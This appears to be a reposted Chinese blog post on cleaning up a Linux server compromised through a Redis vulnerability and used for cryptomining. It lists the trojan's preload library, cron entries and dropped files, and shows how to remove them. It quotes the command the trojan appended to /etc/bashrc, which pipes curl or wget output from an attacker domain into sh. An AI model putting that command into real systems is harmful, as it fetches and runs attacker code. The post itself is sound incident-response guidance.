zoukankan      html  css  js  c++  java
  • redis漏洞攻击

    参考:

    https://www.cnblogs.com/kobexffx/p/11000337.html

    利用redis漏洞获得root权限,挖矿. 解决方法: 用普通帐号启redis,用云的redis

    清理步骤
    背景描述:
    在清除过程中,由于系统动态链接被劫持导致无法正常操作木马进程文件,需要把下面的动态链接库文(libEGLD.so ld.so.preload)件移到其他地方或删除掉。

    一、移除木马生成的动态链接库,由于被修改了动态链接库,系统的命令ps显示的进程并不完全,隐藏掉了木马进程。
    mv /usr/local/lib/libEGLD.so /root/
    mv /etc/ld.so.preload /root/

    二、kill掉木马进程,木马进程名称:
    1.下载busybox (https://busybox.net/downloads/binaries/1.20.0/busybox-x86_64)
    因为系统动态链接库被劫持,导致系统命令不会显示出对应木马进程。该工具集成了linux常用命令且全为静态编译,不受劫持干扰。

    2.利用busybox执行top 查找占用cpu高的异常进程
    实例:
    ./busybox top

    3. 找到对应进程后kill掉。
    实例:
    ../busybox kill -9 pid
    或者 ./busybox pkill 异常进程名称
    三、清除掉crontab的木马定时任务:
    1. /var/spool/cron/目录下所有包含 lsd.systemten.org域名的记录的文件
    2. /etc/cron.d/root目录下所有包含 lsd.systemten.org域名的记录的文件

    四,删除木马释放的文件:
    /usr/local/bin/writeable
    /usr/libexec/writeable
    /usr/bin/writeable
    /etc/rc0.d/K01sshservice
    /etc/rc1.d/K01sshservice
    /var/spool/cron/crontabs/root
    /etc/rc2.d/S01sshservice
    /etc/rc3.d/S01sshservice
    /etc/rc4.d/S01sshservice
    /etc/rc5.d/S01sshservice
    /etc/rc6.d/K01sshservice
    /tmp/ccEIF3Ld.s
    /tmp/ccstOJoH.o
    /tmp/cc1iGERd.res
    /tmp/ccgwA0Gd.c
    /var/spool/cron/crontabs/tmp.XUYfjh
    /tmp/.XImunix
    /usr/local/sbin/sshd
    /usr/lib/systemd/system/sshservice.service
    /usr/local/lib/libEGLD.c
    /var/spool/cron/crontabs/tmp.WtljMO
    /var/spool/cron/crontabs/tmp.olDaF7


    五、恢复木马修改过的文件
    1.恢复被木马修改过的域名指向
    /etc/hosts
    2.删除被木马添加的内容
    /etc/bashrc
    内容: curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

  • 相关阅读:
    209. Minimum Size Subarray Sum
    208. Implement Trie (Prefix Tree)
    207. Course Schedule
    206. Reverse Linked List
    205. Isomorphic Strings
    204. Count Primes
    203. Remove Linked List Elements
    201. Bitwise AND of Numbers Range
    199. Binary Tree Right Side View
    ArcGIS API for JavaScript 4.2学习笔记[8] 2D与3D视图同步
  • 原文地址:https://www.cnblogs.com/hongfeng2019/p/11524292.html
Copyright © 2011-2022 走看看